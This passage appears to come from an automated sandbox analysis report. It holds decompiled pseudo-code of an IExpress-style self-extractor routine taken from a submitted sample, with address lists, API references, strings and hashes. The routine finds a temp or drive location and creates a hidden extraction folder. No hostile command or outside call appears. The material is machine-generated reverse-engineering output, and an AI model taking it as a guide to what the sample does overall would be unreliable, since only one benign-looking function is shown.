                                                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                                                      				int _t54;
                                                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                                                      				char _t60;
                                                                                                                                                                                                                                      				int _t65;
                                                                                                                                                                                                                                      				char _t66;
                                                                                                                                                                                                                                      				int _t67;
                                                                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                                                      				int _t70;
                                                                                                                                                                                                                                      				int _t71;
                                                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                      				int _t73;
                                                                                                                                                                                                                                      				CHAR* _t82;
                                                                                                                                                                                                                                      				CHAR* _t88;
                                                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t28 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                      				_t2 = E00404669("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                      				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                      				if(_t109 != 0) {
                                                                                                                                                                                                                                      					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                      					_t32 = E00404669(_t82, _t109, 1);
                                                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                                                      						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                      						__eflags = _t33;
                                                                                                                                                                                                                                      						if(_t33 == 0) {
                                                                                                                                                                                                                                      							 *0x409a30 = 1;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                                                      						_t35 =  *0x408b3e; // 0x0
                                                                                                                                                                                                                                      						__eflags = _t35;
                                                                                                                                                                                                                                      						if(_t35 == 0) {
                                                                                                                                                                                                                                      							__eflags =  *0x408a24; // 0x0
                                                                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                                                                      								L46:
                                                                                                                                                                                                                                      								_t101 = 0x7d2;
                                                                                                                                                                                                                                      								_t36 = E004064C3(_t82, 0x7d2, 0, E00403200, 0, 0);
                                                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                                                      								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								__eflags =  *0x409a30; // 0x0
                                                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                                                      									goto L46;
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									_t109 = 0x4091e4;
                                                                                                                                                                                                                                      									_t40 = GetTempPathA(0x104, 0x4091e4);
                                                                                                                                                                                                                                      									__eflags = _t40;
                                                                                                                                                                                                                                      									if(_t40 == 0) {
                                                                                                                                                                                                                                      										L19:
                                                                                                                                                                                                                                      										_push(_t82);
                                                                                                                                                                                                                                      										E004017A1( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                      										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                      										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                      											do {
                                                                                                                                                                                                                                      												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                      												__eflags = _t109 - 6;
                                                                                                                                                                                                                                      												if(_t109 == 6) {
                                                                                                                                                                                                                                      													L22:
                                                                                                                                                                                                                                      													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                      													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                      													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                                                      														goto L23;
                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                                                      													__eflags = _t109 - 3;
                                                                                                                                                                                                                                      													if(_t109 != 3) {
                                                                                                                                                                                                                                      														L23:
                                                                                                                                                                                                                                      														__eflags = _t109 - 2;
                                                                                                                                                                                                                                      														if(_t109 != 2) {
                                                                                                                                                                                                                                      															L28:
                                                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                                                      															goto L29;
                                                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                                                      															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                      															if(_t66 == 0x41) {
                                                                                                                                                                                                                                      																L29:
                                                                                                                                                                                                                                      																_t60 = _t66 + 1;
                                                                                                                                                                                                                                      																_v268 = _t60;
                                                                                                                                                                                                                                      																goto L42;
                                                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                                                      																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                      																if(_t66 == 0x42) {
                                                                                                                                                                                                                                      																	goto L29;
                                                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                                                      																	_t68 = E004068FC( &_v268);
                                                                                                                                                                                                                                      																	__eflags = _t68;
                                                                                                                                                                                                                                      																	if(_t68 == 0) {
                                                                                                                                                                                                                                      																		goto L28;
                                                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                                                      																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                      																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                      																			L30:
                                                                                                                                                                                                                                      																			_push(0);
                                                                                                                                                                                                                                      																			_t103 = 3;
                                                                                                                                                                                                                                      																			_t49 = E00405933( &_v268, _t103, 1);
                                                                                                                                                                                                                                      																			__eflags = _t49;
                                                                                                                                                                                                                                      																			if(_t49 != 0) {
                                                                                                                                                                                                                                      																				L33:
                                                                                                                                                                                                                                      																				_t50 = E00402631(0,  &_v268, 1);
                                                                                                                                                                                                                                      																				__eflags = _t50;
                                                                                                                                                                                                                                      																				if(_t50 != 0) {
                                                                                                                                                                                                                                      																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                      																				}
                                                                                                                                                                                                                                      																				_t88 =  &_v268;
                                                                                                                                                                                                                                      																				E00406534(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                      																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                      																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                      																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                      																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                      																					__eflags = _t54;
                                                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                                                      																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                      																				}
                                                                                                                                                                                                                                      																				__eflags = _t54;
                                                                                                                                                                                                                                      																				if(_t54 != 0) {
                                                                                                                                                                                                                                      																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                      																					_push(_t88);
                                                                                                                                                                                                                                      																					_t109 = 0x4091e4;
                                                                                                                                                                                                                                      																					E004017A1(0x4091e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                      																					_t101 = 1;
                                                                                                                                                                                                                                      																					_t59 = E00405423(0x4091e4, 1, 0);
                                                                                                                                                                                                                                      																					__eflags = _t59;
                                                                                                                                                                                                                                      																					if(_t59 != 0) {
                                                                                                                                                                                                                                      																						goto L45;
                                                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                                                      																						_t60 = _v268;
                                                                                                                                                                                                                                      																						goto L42;
                                                                                                                                                                                                                                      																					}
                                                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                                                      																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                      																					_v265 = 0;
                                                                                                                                                                                                                                      																					_v268 = _t60;
                                                                                                                                                                                                                                      																					goto L42;
                                                                                                                                                                                                                                      																				}
                                                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                                                      																				_t65 = E00402631(0,  &_v268, 1);
                                                                                                                                                                                                                                      																				__eflags = _t65;
                                                                                                                                                                                                                                      																				if(_t65 != 0) {
                                                                                                                                                                                                                                      																					goto L28;
                                                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                                                      																					_t67 = E00405933( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                      																					__eflags = _t67;
                                                                                                                                                                                                                                      																					if(_t67 == 0) {
                                                                                                                                                                                                                                      																						goto L28;
                                                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                                                      																						goto L33;
                                                                                                                                                                                                                                      																					}
                                                                                                                                                                                                                                      																				}
                                                                                                                                                                                                                                      																			}
                                                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                                                      																			goto L28;
                                                                                                                                                                                                                                      																		}
                                                                                                                                                                                                                                      																	}
                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                                                      														goto L22;
                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      												goto L47;
                                                                                                                                                                                                                                      												L42:
                                                                                                                                                                                                                                      												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                      											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										goto L43;
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										_t101 = 1;
                                                                                                                                                                                                                                      										_t69 = E00405423(0x4091e4, 1, 3); // executed
                                                                                                                                                                                                                                      										__eflags = _t69;
                                                                                                                                                                                                                                      										if(_t69 != 0) {
                                                                                                                                                                                                                                      											goto L45;
                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                      											_t82 = 0x4091e4;
                                                                                                                                                                                                                                      											_t70 = E00402631(0, 0x4091e4, 1);
                                                                                                                                                                                                                                      											__eflags = _t70;
                                                                                                                                                                                                                                      											if(_t70 != 0) {
                                                                                                                                                                                                                                      												goto L19;
                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                      												_t101 = 1;
                                                                                                                                                                                                                                      												_t82 = 0x4091e4;
                                                                                                                                                                                                                                      												_t71 = E00405423(0x4091e4, 1, 1);
                                                                                                                                                                                                                                      												__eflags = _t71;
                                                                                                                                                                                                                                      												if(_t71 != 0) {
                                                                                                                                                                                                                                      													goto L45;
                                                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                                                      													do {
                                                                                                                                                                                                                                      														goto L19;
                                                                                                                                                                                                                                      														L43:
                                                                                                                                                                                                                                      														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                      														_push(4);
                                                                                                                                                                                                                                      														_t101 = 3;
                                                                                                                                                                                                                                      														_t82 =  &_v268;
                                                                                                                                                                                                                                      														_t44 = E00405933(_t82, _t101, 1);
                                                                                                                                                                                                                                      														__eflags = _t44;
                                                                                                                                                                                                                                      													} while (_t44 != 0);
                                                                                                                                                                                                                                      													goto L2;
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                      							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                                                      								_t72 = 1;
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								__eflags =  *0x408b3f - _t35; // 0x0
                                                                                                                                                                                                                                      								_t72 = 0;
                                                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                                                      									goto L10;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_t101 = 0;
                                                                                                                                                                                                                                      							_t73 = E00405423(0x408b3e, 0, _t72);
                                                                                                                                                                                                                                      							__eflags = _t73;
                                                                                                                                                                                                                                      							if(_t73 != 0) {
                                                                                                                                                                                                                                      								L45:
                                                                                                                                                                                                                                      								_t38 = 1;
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								_t101 = 0x4be;
                                                                                                                                                                                                                                      								E00404495(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      								goto L2;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						_t101 = 0x4b1;
                                                                                                                                                                                                                                      						E00404495(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                                                      						 *0x409124 = 0x80070714;
                                                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t101 = 0x4b5;
                                                                                                                                                                                                                                      					E00404495(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      					 *0x409124 = E00406233();
                                                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                                                      					_t38 = 0;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				L47:
                                                                                                                                                                                                                                      				return E00406C80(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                      			}





































                                                                                                                                                                                                                                      0x00405565
                                                                                                                                                                                                                                      0x0040556c
                                                                                                                                                                                                                                      0x00405583
                                                                                                                                                                                                                                      0x0040558f
                                                                                                                                                                                                                                      0x00405593
                                                                                                                                                                                                                                      0x004055ba
                                                                                                                                                                                                                                      0x004055bf
                                                                                                                                                                                                                                      0x004055c4
                                                                                                                                                                                                                                      0x004055c6
                                                                                                                                                                                                                                      0x004055f2
                                                                                                                                                                                                                                      0x004055fb
                                                                                                                                                                                                                                      0x004055fd
                                                                                                                                                                                                                                      0x004055ff
                                                                                                                                                                                                                                      0x004055ff
                                                                                                                                                                                                                                      0x00405606
                                                                                                                                                                                                                                      0x0040560c
                                                                                                                                                                                                                                      0x00405611
                                                                                                                                                                                                                                      0x00405613
                                                                                                                                                                                                                                      0x00405650
                                                                                                                                                                                                                                      0x00405656
                                                                                                                                                                                                                                      0x00405859
                                                                                                                                                                                                                                      0x00405861
                                                                                                                                                                                                                                      0x00405866
                                                                                                                                                                                                                                      0x0040586d
                                                                                                                                                                                                                                      0x0040586f
                                                                                                                                                                                                                                      0x0040565c
                                                                                                                                                                                                                                      0x0040565c
                                                                                                                                                                                                                                      0x00405662
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405668
                                                                                                                                                                                                                                      0x00405668
                                                                                                                                                                                                                                      0x00405673
                                                                                                                                                                                                                                      0x00405679
                                                                                                                                                                                                                                      0x0040567b
                                                                                                                                                                                                                                      0x004056ad
                                                                                                                                                                                                                                      0x004056ad
                                                                                                                                                                                                                                      0x004056bf
                                                                                                                                                                                                                                      0x004056c4
                                                                                                                                                                                                                                      0x004056cb
                                                                                                                                                                                                                                      0x004056d1
                                                                                                                                                                                                                                      0x004056de
                                                                                                                                                                                                                                      0x004056e0
                                                                                                                                                                                                                                      0x004056e3
                                                                                                                                                                                                                                      0x004056ea
                                                                                                                                                                                                                                      0x004056f1
                                                                                                                                                                                                                                      0x004056f7
                                                                                                                                                                                                                                      0x004056fa
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004056e5
                                                                                                                                                                                                                                      0x004056e5
                                                                                                                                                                                                                                      0x004056e8
                                                                                                                                                                                                                                      0x004056fc
                                                                                                                                                                                                                                      0x004056fc
                                                                                                                                                                                                                                      0x004056ff
                                                                                                                                                                                                                                      0x00405725
                                                                                                                                                                                                                                      0x00405725
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405701
                                                                                                                                                                                                                                      0x00405701
                                                                                                                                                                                                                                      0x00405707
                                                                                                                                                                                                                                      0x00405709
                                                                                                                                                                                                                                      0x0040572b
                                                                                                                                                                                                                                      0x0040572b
                                                                                                                                                                                                                                      0x0040572d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040570b
                                                                                                                                                                                                                                      0x0040570b
                                                                                                                                                                                                                                      0x0040570d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040570f
                                                                                                                                                                                                                                      0x00405715
                                                                                                                                                                                                                                      0x0040571a
                                                                                                                                                                                                                                      0x0040571c
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040571e
                                                                                                                                                                                                                                      0x0040571e
                                                                                                                                                                                                                                      0x00405723
                                                                                                                                                                                                                                      0x00405738
                                                                                                                                                                                                                                      0x00405738
                                                                                                                                                                                                                                      0x0040573b
                                                                                                                                                                                                                                      0x00405742
                                                                                                                                                                                                                                      0x00405747
                                                                                                                                                                                                                                      0x00405749
                                                                                                                                                                                                                                      0x0040576c
                                                                                                                                                                                                                                      0x00405772
                                                                                                                                                                                                                                      0x00405777
                                                                                                                                                                                                                                      0x00405779
                                                                                                                                                                                                                                      0x00405787
                                                                                                                                                                                                                                      0x00405787
                                                                                                                                                                                                                                      0x00405797
                                                                                                                                                                                                                                      0x0040579d
                                                                                                                                                                                                                                      0x004057a9
                                                                                                                                                                                                                                      0x004057af
                                                                                                                                                                                                                                      0x004057b2
                                                                                                                                                                                                                                      0x004057c4
                                                                                                                                                                                                                                      0x004057c4
                                                                                                                                                                                                                                      0x004057b4
                                                                                                                                                                                                                                      0x004057bc
                                                                                                                                                                                                                                      0x004057bc
                                                                                                                                                                                                                                      0x004057c7
                                                                                                                                                                                                                                      0x004057c9
                                                                                                                                                                                                                                      0x004057ea
                                                                                                                                                                                                                                      0x004057f0
                                                                                                                                                                                                                                      0x004057f7
                                                                                                                                                                                                                                      0x00405805
                                                                                                                                                                                                                                      0x0040580b
                                                                                                                                                                                                                                      0x0040580f
                                                                                                                                                                                                                                      0x00405814
                                                                                                                                                                                                                                      0x00405816
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405818
                                                                                                                                                                                                                                      0x00405818
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405818
                                                                                                                                                                                                                                      0x004057cb
                                                                                                                                                                                                                                      0x004057d1
                                                                                                                                                                                                                                      0x004057d3
                                                                                                                                                                                                                                      0x004057d9
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004057d9
                                                                                                                                                                                                                                      0x0040574b
                                                                                                                                                                                                                                      0x00405751
                                                                                                                                                                                                                                      0x00405756
                                                                                                                                                                                                                                      0x00405758
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040575a
                                                                                                                                                                                                                                      0x00405763
                                                                                                                                                                                                                                      0x00405768
                                                                                                                                                                                                                                      0x0040576a
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040576a
                                                                                                                                                                                                                                      0x00405758
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405723
                                                                                                                                                                                                                                      0x0040571c
                                                                                                                                                                                                                                      0x0040570d
                                                                                                                                                                                                                                      0x00405709
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004056e8
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040581e
                                                                                                                                                                                                                                      0x0040581e
                                                                                                                                                                                                                                      0x0040581e
                                                                                                                                                                                                                                      0x004056d1
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040567d
                                                                                                                                                                                                                                      0x0040567f
                                                                                                                                                                                                                                      0x00405683
                                                                                                                                                                                                                                      0x00405688
                                                                                                                                                                                                                                      0x0040568a
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405690
                                                                                                                                                                                                                                      0x00405690
                                                                                                                                                                                                                                      0x00405692
                                                                                                                                                                                                                                      0x00405697
                                                                                                                                                                                                                                      0x00405699
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040569b
                                                                                                                                                                                                                                      0x0040569c
                                                                                                                                                                                                                                      0x0040569e
                                                                                                                                                                                                                                      0x004056a0
                                                                                                                                                                                                                                      0x004056a5
                                                                                                                                                                                                                                      0x004056a7
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004056ad
                                                                                                                                                                                                                                      0x004056ad
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405826
                                                                                                                                                                                                                                      0x00405832
                                                                                                                                                                                                                                      0x00405838
                                                                                                                                                                                                                                      0x0040583c
                                                                                                                                                                                                                                      0x0040583d
                                                                                                                                                                                                                                      0x00405843
                                                                                                                                                                                                                                      0x00405848
                                                                                                                                                                                                                                      0x00405848
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405850
                                                                                                                                                                                                                                      0x004056a7
                                                                                                                                                                                                                                      0x00405699
                                                                                                                                                                                                                                      0x0040568a
                                                                                                                                                                                                                                      0x0040567b
                                                                                                                                                                                                                                      0x00405662
                                                                                                                                                                                                                                      0x00405615
                                                                                                                                                                                                                                      0x00405615
                                                                                                                                                                                                                                      0x00405617
                                                                                                                                                                                                                                      0x00405623
                                                                                                                                                                                                                                      0x00405623
                                                                                                                                                                                                                                      0x00405619
                                                                                                                                                                                                                                      0x00405619
                                                                                                                                                                                                                                      0x0040561f
                                                                                                                                                                                                                                      0x00405621
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405621
                                                                                                                                                                                                                                      0x00405626
                                                                                                                                                                                                                                      0x0040562d
                                                                                                                                                                                                                                      0x00405632
                                                                                                                                                                                                                                      0x00405634
                                                                                                                                                                                                                                      0x00405855
                                                                                                                                                                                                                                      0x00405855
                                                                                                                                                                                                                                      0x0040563a
                                                                                                                                                                                                                                      0x0040563f
                                                                                                                                                                                                                                      0x00405646
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405646
                                                                                                                                                                                                                                      0x00405634
                                                                                                                                                                                                                                      0x004055c8
                                                                                                                                                                                                                                      0x004055cd
                                                                                                                                                                                                                                      0x004055d4
                                                                                                                                                                                                                                      0x004055da
                                                                                                                                                                                                                                      0x004055e0
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004055e0
                                                                                                                                                                                                                                      0x00405595
                                                                                                                                                                                                                                      0x0040559a
                                                                                                                                                                                                                                      0x004055a1
                                                                                                                                                                                                                                      0x004055ab
                                                                                                                                                                                                                                      0x004055b0
                                                                                                                                                                                                                                      0x004055b0
                                                                                                                                                                                                                                      0x004055b0
                                                                                                                                                                                                                                      0x00405871
                                                                                                                                                                                                                                      0x0040587f

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040467A
                                                                                                                                                                                                                                        • Part of subcall function 00404669: SizeofResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00404683
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040469D
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LoadResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A6
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LockResource.KERNEL32(00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046AD
                                                                                                                                                                                                                                        • Part of subcall function 00404669: memcpy_s.MSVCRT ref: 004046BF
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046C9
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00405589
                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 004055F2
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00405606
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 004055DA
                                                                                                                                                                                                                                        • Part of subcall function 00404495: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004044F4
                                                                                                                                                                                                                                        • Part of subcall function 00404495: MessageBoxA.USER32(?,?,OxZQ,00010010), ref: 00404530
                                                                                                                                                                                                                                        • Part of subcall function 00406233: GetLastError.KERNEL32(00405B72), ref: 00406233
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00405673
                                                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 004056D8
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 004056F1
                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00405787
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 004057A9
                                                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 004057BC
                                                                                                                                                                                                                                        • Part of subcall function 00402631: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00402655
                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 004057EA
                                                                                                                                                                                                                                        • Part of subcall function 004064C3: FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 004064D6
                                                                                                                                                                                                                                        • Part of subcall function 004064C3: LoadResource.KERNEL32(00400000,00000000,?,?,00402EDF,00000000,00401A00,00000547,0000083E,?,?,?,?,?,?,?), ref: 004064E4
                                                                                                                                                                                                                                        • Part of subcall function 004064C3: DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,00401A00,00000000), ref: 00406503
                                                                                                                                                                                                                                        • Part of subcall function 004064C3: FreeResource.KERNEL32(00000000,?,?,00402EDF,00000000,00401A00,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 0040650C
                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00405832
                                                                                                                                                                                                                                        • Part of subcall function 00405933: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 0040595E
                                                                                                                                                                                                                                        • Part of subcall function 00405933: SetCurrentDirectoryA.KERNELBASE(?), ref: 00405965
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                      • API String ID: 2436801531-1124914566
                                                                                                                                                                                                                                      • Opcode ID: 3e485c70dfbb5f7dd959ac107fcc14c1f2b36183a4432a224ef631f2c28a8909
                                                                                                                                                                                                                                      • Instruction ID: 9eb33f2b5fdc10dfa316e55c0a5da3e11e569ca80d763ad6cdef17cba4650bd5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e485c70dfbb5f7dd959ac107fcc14c1f2b36183a4432a224ef631f2c28a8909
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12812971A006149ADB20AB319D45BEF766DDB50304F40447BF586F22D1DF7C8D828E1D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
